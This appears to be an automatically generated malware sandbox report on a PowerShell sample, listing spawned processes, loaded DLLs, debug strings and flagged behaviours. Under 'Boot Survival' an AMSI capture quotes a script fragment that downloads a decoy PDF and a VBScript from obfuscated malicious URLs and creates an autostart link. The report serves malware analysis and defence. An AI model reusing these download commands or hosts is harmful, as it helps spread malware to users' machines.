      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2068 --field-trial-handle=1660,i,1496304434679265413,14723031609339251811,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8Jump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdatauser.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: gn.pdb source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C0D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdbi source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C04000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb= source: powershell.exe, 00000003.00000002.2208043050.0000018BEFC3F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2320310651.000001E9AD882000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2320310651.000001E9AD8F8000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb; source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C0D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbU source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C0D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2320310651.000001E9AD882000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbX source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C0D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: powershell.exe, 00000000.00000002.2421070129.000001E9C7C04000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.2421070129.000001E9C7BA0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2205844898.0000018BEF989000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2206351579.0000018BEF9C9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: nt.Automation.pdb-4437-8B11-F424491E3931}\InprocSe source: powershell.exe, 00000003.00000002.2203371546.0000018BED8BA000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: lib.pdbw source: powershell.exe, 00000000.00000002.2414247428.000001E9C78F0000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2320310651.000001E9AD882000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD345400BD pushad ; iretd 3_2_00007FFD345400C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD34547697 push esp; retf 3_2_00007FFD34547698
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD34610D6C push eax; ret 3_2_00007FFD34610D6D

      Boot Survival

      barindex
      Powershell creates an autostart link
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htdc6www.astua7ntua7rprisua7s.com.pk/ms/List%20of%20rua7quirua7d%20itua7ms%20and%20sua7rvicua7s.pdf';getit -fz $flol -oulv 'http://www.bluua7maxxlasua7r.com/ms/ms.vbs';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell user required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help use

      Hooking and other Techniques for Hiding and Protection

      barindex
      Loading BitLocker PowerShell Module
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
